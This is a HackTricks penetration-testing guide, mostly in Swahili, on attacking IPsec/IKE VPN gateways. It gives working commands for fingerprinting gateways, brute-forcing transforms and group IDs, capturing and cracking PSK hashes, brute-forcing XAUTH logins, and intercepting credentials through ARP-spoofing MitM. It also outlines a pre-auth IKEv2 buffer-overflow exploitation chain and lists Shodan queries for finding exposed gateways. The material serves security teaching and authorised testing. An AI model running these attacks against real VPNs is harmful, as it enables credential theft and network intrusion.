500/udp - Pentesting IPsec/IKE VPN

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

IPsec inatambuliwa kwa ujumla kama teknolojia kuu ya kuimarisha mawasiliano kati ya mitandao (LAN-to-LAN) na kutoka kwa watumiaji wa mbali hadi gateway ya mtandao (remote access), ikitumika kama nguzo kuu ya suluhisho za VPN zaEnterprise.

Uanzishaji wa security association (SA) kati ya pointi mbili unasimamiwa na IKE, ambayo inafanya kazi chini ya ISAKMP, protokoli iliyoundwa kwa uthibitishaji na kubadilishana funguo. Mchakato huu unafanyika kwa hatua kadhaa:

• Phase 1: Chaneli salama inaundwa kati ya endpoints mbili. Hii inafikiwa kwa kutumia Pre-Shared Key (PSK) au vyeti, kwa kutumia main mode, ambayo inahusisha jozi tatu za ujumbe, au aggressive mode.
• Phase 1.5: Ingawa si lazima, hatua hii, inayojulikana kama Extended Authentication Phase, inathibitisha utambulisho wa mtumiaji anayejaribu kuunganishwa kwa kuhitaji username na password.
• Phase 2: Hatua hii inalenga kujadili vigezo vya kulinda data kwa kutumia ESP na AH. Inaruhusu matumizi ya algorithms tofauti na zile za Phase 1 ili kuhakikisha Perfect Forward Secrecy (PFS), ikiboresha usalama.

Bandari ya chaguo-msingi: 500/udp

Pia mara nyingi inafunguliwa: 4500/udp (NAT Traversal)

Gundua huduma kwa kutumia nmap

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

Finding a valid transformation

Usanidi wa IPSec unaweza kuandaliwa ili ukubali tu transformations moja au chache. A transformation ni mchanganyiko wa thamani. Each transform ina idadi ya sifa kama DES au 3DES kama encryption algorithm, SHA au MD5 kama integrity algorithm, pre-shared key kama authentication type, Diffie-Hellman 1 au 2 kama key distribution algorithm na 28800 sekunde kama lifetime.

Kisha, jambo la kwanza unalotakiwa kufanya ni find a valid transformation, ili server itakubali kuzungumza nawe. Kwa kufanya hivyo, unaweza kutumia zana ike-scan. Kwa chaguo-msingi, Ike-scan hufanya kazi katika main mode, na hutuma paketi kwa gateway yenye kichwa cha ISAKMP na pendekezo moja lenye eight transforms inside it.

Kulingana na jibu unaweza kupata baadhi ya taarifa kuhusu endpoint:

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

Kama unavyoona katika jibu la awali, kuna uwanja uitwao AUTH wenye thamani PSK. Hii ina maana kwamba vpn imewekwa kwa kutumia preshared key (na hili ni nzuri sana kwa pentester).
Thamani ya mstari wa mwisho pia ni muhimu sana:

• 0 returned handshake; 0 returned notify: Hii ina maana the target is not an IPsec gateway.
• 1 returned handshake; 0 returned notify: Hii ina maana the target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable (transform halali itaonyeshwa kwenye output).
• 0 returned handshake; 1 returned notify: VPN gateways zinajibu kwa notify message wakati none of the transforms are acceptable (hata hivyo baadhi ya gateways hazifanyi hivyo, katika kesi hiyo uchambuzi zaidi na pendekezo lililosasishwa linapaswa kujaribiwa).

Kisha, katika kesi hii tayari tuna transformation halali lakini kama uko katika kesi ya 3, basi unahitaji brute-force kidogo ili kupata transformation halali:

Kwanza kabisa unahitaji kuunda transformations zote zinazowezekana:

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

Kisha fanyia brute-force kila moja kwa kutumia ike-scan (hii inaweza kuchukua dakika kadhaa):

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

Ikiwa brute-force haikufanikiwa, labda seva inajibu bila handshakes hata kwa valid transforms. Kisha, unaweza kujaribu brute-force ile ile ukitumia aggressive mode:

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

Kwa matumaini mabadiliko halali yatarudishwa.
Unaweza kujaribu the same attack kwa kutumia iker.py.
Unaweza pia kujaribu brute force mabadiliko kwa kutumia ikeforce:

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

Katika DH Group: 14 = 2048-bit MODP na 15 = 3072-bit
2 = HMAC-SHA = SHA1 (in this case). The --trans format is $Enc,$Hash,$Auth,$DH

Cisco inaonyesha kuepuka kutumia DH groups 1 na 2 kwa sababu hazina nguvu ya kutosha. Wataalamu wanaamini kwamba mataifa yenye rasilimali nyingi yanaweza kuvunja encryption kwa urahisi ya data inayotumia makundi dhaifu haya. Hii hufanywa kwa kutumia mbinu maalum inayowaandaa kuvunja nambari haraka. Ingawa inagharimu pesa nyingi kuanzisha mbinu hizi, inawawezesha mataifa yenye nguvu kusoma data iliyofichwa kwa wakati halisi ikiwa inatumia group isiyo imara (kama 1,024-bit au ndogo).

Server fingerprinting

Kisha, unaweza kutumia ike-scan kujaribu kugundua muuzaji wa kifaa. Zana hiyo inatuma pendekezo la awali na kisha inasimamisha replay. Kisha, itafanya uchambuzi wa tofauti za muda kati ya jumbe zilizopokelewa kutoka kwa server na muundo wa majibu unaolingana; pentester anaweza kwa mafanikio kufanya fingerprint muuzaji wa gateway ya VPN. Zaidi ya hayo, baadhi ya server za VPN zitumie hiari Vendor ID (VID) payload pamoja na IKE.

Taja transformation sahihi ikiwa inahitajika (using –trans)

Ikiwa IKE itagundua muuzaji, itataja:

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

Hii pia inaweza kufanywa kwa kutumia script ya nmap ike-version

IKEv2-specific: WatchGuard Vendor ID version fingerprinting

Baadhi ya daemons za IKEv2 hujumuisha Vendor ID payloads zisizo za kawaida katika mwitikio wa IKE_SA_INIT. WatchGuard Fireware OS inaandika toleo/build ya appliance moja kwa moja ndani ya VID, ikiruhusu single-packet, pre-auth fingerprinting.

• Transport: UDP/500 (na UDP/4500 kwa NAT-T)
• Packet: mwitikio wa IKE_SA_INIT una Vendor ID payloads moja au zaidi
• WatchGuard format: 32-byte hash ikifuatiwa na base64 ambayo inatafsiriwa kuwa kwa mfano VN=12.11.3 BN=719894

Mfano wa raw bytes kutoka kwa WatchGuard VID payload (12 bytes za mwisho ni base64):

00000000: bfc2 2e98 56ba 9936 11c1 1e48 a6d2 0807  ....V..6...H....
00000010: a95b edb3 9302 6a49 e60f ac32 7bb9 601b  .[....jI...2{.`.
00000020: 566b 3439 4d54 4975 4d54 4575 4d79 4243  Vk49MTIuMTEuMyBC
00000030: 546a 3033 4d54 6b34 4f54 513d            Tj03MTk4OTQ=

Uchimbaji wa haraka kwenye shell wakati una tail ya base64:

echo 'Vk49MTIuMTEuMyBCTj03MTk4OTQ=' | base64 -d
# VN=12.11.3 BN=719894

Notes

• Hii si sehemu ya IKEv2 RFC yoyote. Itaichukue kama tabia isiyo ya kawaida ya muuzaji kwa kupima haraka toleo za Fireware OS zilizofichuka/zinazoathirika.
• Unahitaji tu kupata jibu la IKE_SA_INIT; hakuna uthibitisho unaohitajika.

Finding the correct ID (group name)

For being allowed to capture the hash you need a valid transformation supporting Aggressive mode and the correct ID (group name). You probably won’t know the valid group name, so you will have to brute-force it.
To do so, I would recommend you 2 methods:

Bruteforcing ID with ike-scan

First of all try to make a request with a fake ID trying to gather the hash (“-P”):

ike-scan -P -M -A -n fakeID <IP>

Ikiwa no hash is returned, basi huenda njia hii ya brute forcing itafanya kazi. If some hash is returned, this means that a fake hash is going to be sent back for a fake ID, so this method won’t be reliable kwa brute-force ya ID. Kwa mfano, fake hash inaweza kurudishwa (hii hutokea katika toleo za kisasa):

Lakini kama nilivyosema, ikiwa no hash is returned, basi unapaswa kujaribu brute-force common group names kwa kutumia ike-scan.

Script hii will try to brute-force possible IDs na itarudisha IDs ambazo zinarudisha valid handshake (hii itakuwa valid group name).

Kama umegundua transformation maalum, iongeze kwenye amri ya ike-scan. Na kama umegundua transformations kadhaa, jisikie huru kuongeza loop mpya kuzijaribu zote (unapaswa kuzijaribu zote mpaka moja ifanye kazi ipasavyo).

Unaweza kutumia the dictionary of ikeforce au the one in seclists ya common group names ku-brute-force them:

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Au tumia dict hii (ni mchanganyiko wa dict nyingine 2 bila kurudiwa):

Bruteforcing ID with Iker

iker.py pia inatumia ike-scan ku-bruteforce majina ya group yanayowezekana. Inafuata mbinu yake ya kutafuta ID halali kulingana na matokeo ya ike-scan.

Bruteforcing ID with ikeforce

ikeforce.py ni chombo ambacho kinaweza kutumika kufanya brute force IDs pia. Chombo hiki kitapitia kujaribu kuitumia vulnerabilities mbalimbali ambazo zinaweza kutumika kutofautisha kati ya ID halali na isiyo halali (inaweza kuwa na false positives na false negatives, ndiyo sababu napendelea kutumia mbinu ya ike-scan inapowezekana).

Kwa default ikeforce itatuma mwanzoni baadhi ya random ids ili kuangalia tabia ya server na kuamua mbinu ya kutumia.

• The first method is to brute-force the group names by searching for the information Dead Peer Detection DPD of Cisco systems (this info is only replayed by the server if the group name is correct).
• The second method available is to checks the number of responses sent to each try because sometimes more packets are sent when the correct id is used.
• The third method consist on searching for “INVALID-ID-INFORMATION” in response to incorrect ID.
• Finally, if the server does not replay anything to the checks, ikeforce will try to brute force the server and check if when the correct id is sent the server replay with some packet.
  Mwishowe, ikiwa server haitarudii chochote kwa ukaguzi, ikeforce itajaribu ku-brute force server na kuangalia kama wakati id sahihi itapotumwa server itarejea kwa pakiti fulani.

Naam, lengo la ku-brute force id ni kupata PSK ukiwa na id halali. Kisha, kwa kutumia id na PSK utalazimika ku-bruteforce XAUTH (ikiwa imewezeshwa).

Ikiwa umegundua mabadiliko maalum ya transformation, ongeza hiyo kwenye amri ya ikeforce. Na ikiwa umegundua transformations kadhaa jisikie huru kuongeza loop mpya kuzijaribu zote (unapaswa kuzifanya zote mpaka moja kati yao itakayofanya kazi ipasavyo).

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library

./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

Sniffing ID

(From the book Network Security Assessment: Know Your Network): Pia inawezekana kupata majina ya watumiaji halali kwa sniffing muunganisho kati ya VPN client na server, kwani Aggressive Mode packet ya kwanza inayobeba client ID inatumwa kwa wazi

Aggressive Mode identity leakage

Aggressive Mode lazima itume ID mapema ili gateway iweze kuchagua PSK sahihi wakati kuna multiple groups/users. Hii ina maana kitambulisho kinafunuliwa pre-auth, tofauti na Main Mode ambapo hubaki iliyofichwa (encrypted) katika pakiti za baadaye. Unaweza kuitoa kwa haraka:

ike-scan -A <IP>
# Look for: ID(Type=ID_USER_FQDN, Value=ike@corp.tld)

Ikiwa Aggressive Mode imewezeshwa, rekodi PSK handshake inayoweza kuvunjwa na ivunjwe offline (hashcat mode 5400):

ike-scan -A --pskcrack=handshake.txt <IP>
hashcat -m 5400 handshake.txt /path/to/wordlist.txt

PSKs zilizopatikana mara nyingi hutumika tena kama vitambulisho kwa huduma nyingine (SSH, VPN client auth), kwa hivyo vipime dhidi ya huduma zilizo wazi.

Capturing & cracking the hash

Hatimaye, ikiwa umepata valid transformation na group name na ikiwa aggressive mode imeruhusiwa, basi unaweza kwa urahisi kupata crackable hash:

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

Hash itahifadhiwa ndani ya hash.txt.

Unaweza kutumia psk-crack, john (ukitumia ikescan2john.py) na hashcat kufanya crack ya hash:

psk-crack -d <Wordlist_path> psk.txt

XAuth

Aggressive mode IKE ikichanganywa na Pre-Shared Key (PSK) mara nyingi hutumika kwa madhumuni ya uthibitishaji wa kundi. Mbinu hii inaongezwa na XAuth (Extended Authentication), ambayo hutoa safu ya ziada ya uthibitishaji wa mtumiaji. Uthibitishaji huo kawaida hutegemea huduma kama Microsoft Active Directory, RADIUS, au mifumo kama hiyo.

Kwa kuhamia IKEv2, kuna mabadiliko yanayoonekana ambapo EAP (Extensible Authentication Protocol) inatumiwa badala ya XAuth kwa ajili ya kuthibitisha watumiaji. Mabadiliko haya yanaonyesha maendeleo katika mbinu za uthibitishaji ndani ya itifaki za mawasiliano salama.

MitM ya mtandao wa ndani ili kushika sifa za kuingia

Hivyo unaweza kushika data za kuingia kwa kutumia fiked na kuona kama kuna jina la mtumiaji la chaguo-msingi (Unahitaji kuelekeza trafiki ya IKE kwa fiked kwa ajili ya sniffing, jambo ambalo linaweza kufanywa kwa msaada wa ARP spoofing, more info). Fiked itafanya kazi kama VPN endpoint na itakamata sifa za XAuth:

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

Pia, ukitumia IPSec jaribu kufanya MitM attack na kuzuia trafiki yote kwa port 500; ikiwa IPSec tunnel haiwezi kuanzishwa, labda trafiki itatumwa wazi.

Brute-forcing XAUTH username na password na ikeforce

Ili kufanya brute force kwenye XAUTH (ukiwa unajua jina la group halali id na psk), unaweza kutumia username moja au orodha ya usernames na orodha ya passwords:

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

Kwa njia hii, ikeforce itajaribu kuunganishwa ikitumia kila mchanganyiko wa username:password.

Ikiwa umepata transforms moja au kadhaa zinazofanya kazi, zitumie kama ulivyofanya katika hatua zilizopita.

Uthibitishaji na IPSEC VPN

Katika Kali, VPNC inatumika kuanzisha tunnels za IPsec. The profiles must be located in the directory /etc/vpnc/. Unaweza kuanzisha profiles hizi kwa kutumia amri vpnc.

Amri na usanidi zifuatazo zinaonyesha mchakato wa kuanzisha muunganisho wa VPN kwa kutumia VPNC:

root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0

Katika mpangilio huu:

• Badilisha [VPN_GATEWAY_IP] kwa anwani halisi ya IP ya lango la VPN.
• Badilisha [VPN_CONNECTION_ID] na kitambulisho cha muunganisho wa VPN.
• Badilisha [VPN_GROUP_SECRET] na secret ya kundi la VPN.
• Badilisha [VPN_USERNAME] na [VPN_PASSWORD] na vitambulisho vya uthibitisho vya VPN.
• [PID] inaonyesha process ID itakayopangwa wakati vpnc itapoanzisha.

Hakikisha kuwa thamani halisi, salama zinatumika kubadilisha placeholders wakati wa kusanidi VPN.

IKEv2 exploitation notes: pre-auth IDi/CERT processing bugs

Vifaa vya kisasa vya VPN mara nyingi huweka wazi IKEv2 kwenye UDP/500 (na UDP/4500 kwa NAT-T). Uso wa kawaida wa shambulio kabla ya uthibitisho ni uchambuzi wa Identification (IDi) na Certificate payloads wakati wa IKE_SA_AUTH.

Mtiririko wa juu wa uvitio wakati parser dhaifu ya IKEv2 ipo:

• Tuma IKE_SA_INIT halali ili kujadili transforms na kukamilisha Diffie–Hellman.
• Fuata na IKE_SA_AUTH inayobeba IDi inayosababisha mende (kwa mfano, Identification iliyo kubwa kupita kiasi iliyokopwa ndani ya buffer ya stack ya ukubwa thabiti kabla ya uthibitisho wa certificate).
• Uharibifu wa kumbukumbu unaotokea unaweza kutoa udhibiti wa rejista iliyohifadhiwa na anwani ya kurudi.
• Ikiwa NX imewezeshwa lakini mikondo mingine ya kulinda inakosekana (hakuna PIE/canaries), jenga mnyororo wa ROP ili kuita mprotect kwenye ukurasa wa stack kisha pindisha utekelezaji kwa shellcode iliyochomwa au kwa interpreter aliyeko (mfano, /usr/bin/python3) ikiwa hakuna /bin/sh inapatikana.

Example default transforms observed on some IKEv2 appliances (WatchGuard Fireware OS 12.11.3):

• SHA2-256–AES(256-bit) with DH Group 14
• SHA1–AES(256-bit) with DH Group 5
• SHA1–AES(256-bit) with DH Group 2
• SHA1–3DES with DH Group 2

Vidokezo vya vitendo

• Lenga UDP/500 na UDP/4500; seva za NAT-T zinaweza kujibu tu kwenye 4500.
• Ongeza buffer ya kupokea na timeouts kwa scanners za UDP ili kuepuka kupoteza vifurushi.
• Kama huduma inaonyesha custom Vendor IDs (tazama sehemu hapo juu), zitumie kubaini kwa haraka toleo zilizo dhaifu kabla ya kujaribu trafiki ya uvitio.

Reference Material

• PSK cracking paper
• SecurityFocus Infocus
• Scanning a VPN Implementation
• Network Security Assessment 3rd Edition

Shodan

• port:500 IKE
• port:4500 "UDP"
• udp port:500,4500 "WatchGuard"

References

• YIKES: WatchGuard Fireware OS IKEv2 out-of-bounds write (CVE-2025-9242)
• 0xdf – HTB: Expressway

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.